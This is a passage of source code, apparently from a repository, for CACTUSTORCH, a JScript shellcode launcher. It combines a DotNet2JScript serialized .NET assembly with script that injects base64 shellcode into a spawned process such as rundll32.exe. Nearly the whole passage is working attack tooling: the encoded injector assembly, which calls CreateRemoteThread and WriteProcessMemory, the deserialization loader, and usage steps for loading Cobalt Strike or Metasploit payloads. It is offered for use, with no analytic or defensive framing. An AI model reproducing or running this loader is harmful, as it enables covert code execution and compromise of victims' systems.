"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 78 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 79 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 80 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 81 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 82 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 
83 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA"+ 84 | "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ 85 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA"+ 86 | "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 87 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 88 | "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"+ 89 | "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"+ 90 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA"+ 91 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"+ 92 | "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"+ 93 | "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"+ 94 | "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR"+ 95 | "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA"+ 96 | "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR"+ 97 | "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V"+ 98 | "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA"+ 99 | "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu"+ 100 | "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR"+ 101 | "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA"+ 102 | "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA"+ 103 | "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh"+ 104 | "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA"+ 105 | "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9"+ 106 | 
"AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA"+ 107 | "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/"+ 108 | "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA"+ 109 | "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED"+ 110 | "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA"+ 111 | "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH"+ 112 | "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA"+ 113 | "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/"+ 114 | "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG"+ 115 | "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS"+ 116 | "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA"+ 117 | "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA"+ 118 | "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH"+ 119 | "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD"+ 120 | "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I"+ 121 | "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF"+ 122 | "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA"+ 123 | "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+"+ 124 | "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA"+ 125 | "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE"+ 126 | "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A"+ 127 | "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ"+ 128 | "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA"+ 129 | 
"CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw"+ 130 | "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB"+ 131 | "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz"+ 132 | "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA"+ 133 | "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA"+ 134 | "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy"+ 135 | "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP"+ 136 | "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V"+ 137 | "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD"+ 138 | "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV"+ 139 | "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW"+ 140 | "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf"+ 141 | "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf"+ 142 | "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT"+ 143 | "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM"+ 144 | "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X"+ 145 | "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU"+ 146 | "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV"+ 147 | "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG"+ 148 | "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT"+ 149 | "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS"+ 150 | "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi"+ 151 | "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU"+ 152 | 
"aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl"+ 153 | "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA"+ 154 | "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl"+ 155 | "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli"+ 156 | "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp"+ 157 | "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs"+ 158 | "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv"+ 159 | "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0"+ 160 | "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp"+ 161 | "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp"+ 162 | "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG"+ 163 | "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr"+ 164 | "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy"+ 165 | "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj"+ 166 | "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk"+ 167 | "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj"+ 168 | "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT"+ 169 | "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz"+ 170 | "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD"+ 171 | "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA"+ 172 | "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB"+ 173 | "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj"+ 174 | "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0"+ 175 | 
"AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl"+ 176 | "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0"+ 177 | "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP"+ 178 | "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB"+ 179 | "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O"+ 180 | "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA"+ 181 | "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA"+ 182 | "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA"+ 183 | "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC"+ 184 | "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY"+ 185 | "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB"+ 186 | "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm"+ 187 | "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA"+ 188 | "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg"+ 189 | "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+ 190 | "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"+ 191 | "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+ 192 | "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+ 193 | "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"+ 194 | "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"+ 195 | "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"+ 196 | "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"+ 197 | "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"+ 198 | 
"ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"+ 199 | "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"+ 200 | "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+ 201 | "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"+ 202 | "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"+ 203 | "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"+ 204 | "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"+ 205 | "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 206 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 207 | "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 208 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 209 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 210 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 211 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 212 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 213 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 214 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 215 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 216 | "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"+ 217 | "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"; 218 | var entry_class = 'cactusTorch'; 219 | 220 | try { 221 | setversion(); 222 | var stm = base64ToStream(serialized_obj); 223 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 224 | var al = new ActiveXObject('System.Collections.ArrayList'); 225 | var n = 
fmt.SurrogateSelector; 226 | var d = fmt.Deserialize_2(stm); 227 | al.Add(n); 228 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 229 | o.flame(binary,code); 230 | } catch (e) { 231 | debug(e.message); 232 | } -------------------------------------------------------------------------------- /CACTUSTORCH.jse: -------------------------------------------------------------------------------- 1 | /* 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | Author: Vincent Yiu (@vysecurity) 12 | Credits: 13 | - @cn33liz: Inspiration with StarFighter 14 | - @ttiraniddo: James Forshaw for DotNet2JScript 15 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 16 | 17 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 18 | 19 | Usage: 20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | Run: cat payload.bin | base64 -w 0 23 | Copy the base64 encoded payload into the code variable below. 24 | 25 | */ 26 | 27 | // Replace binary with a executable in both SYSTEM32 and SYSWOW64 that you want to use as container. eg. 
notepad.exe, calc.exe 28 | var binary = "rundll32.exe"; 29 | 30 | // Replace code with base64 encoded 32 bit shellcode 31 | var code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA"; 32 | 33 | 34 | // ------------ DO NOT EDIT BELOW HERE -------------- 35 | 36 | function setversion() { 37 | var shell = new ActiveXObject('WScript.Shell'); 38 | ver = 'v4.0.30319'; 39 | try { 40 | shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\'); 41 | } catch(e) { 42 | ver = 'v2.0.50727'; 43 | } 44 | shell.Environment('Process')('COMPLUS_Version') = ver; 45 | 46 | } 47 | function debug(s) {} 48 | function base64ToStream(b) { 49 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 50 | var length = enc.GetByteCount_2(b); 51 | var ba = enc.GetBytes_4(b); 52 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 53 | ba = transform.TransformFinalBlock(ba, 0, length); 54 | var ms = new ActiveXObject("System.IO.MemoryStream"); 55 | ms.Write(ba, 0, (length / 4) * 3); 56 | ms.Position = 0; 57 | return ms; 58 | } 59 | 60 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 61 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 62 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 63 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 64 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 65 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 66 | 
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 67 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 68 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 69 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 70 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 71 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 72 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 73 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 74 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 75 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 76 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 77 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 78 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 79 | 